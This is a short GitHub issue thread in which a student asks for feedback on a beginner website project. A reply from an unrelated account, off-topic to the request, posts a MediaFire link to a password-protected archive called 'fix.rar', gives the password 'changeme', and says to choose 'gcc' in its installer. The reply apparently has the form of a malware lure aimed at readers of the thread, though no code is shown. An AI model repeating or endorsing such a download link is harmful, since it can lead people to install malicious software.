### ISSUE TITLE
Feedback - Level 1

### ISSUE THREAD

**Issue by J-Thomas-Teratoid** [J-Thomas-Teratoid/j-thomas-teratoid.github.io#1]
Hello Ed

I would like some feedback on my level 1 website. I have included the code, video demonstration and recorded reflection. I am sorry if the video is low quality. This is because GitHub will not accept files over 100MB.

Thank you.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
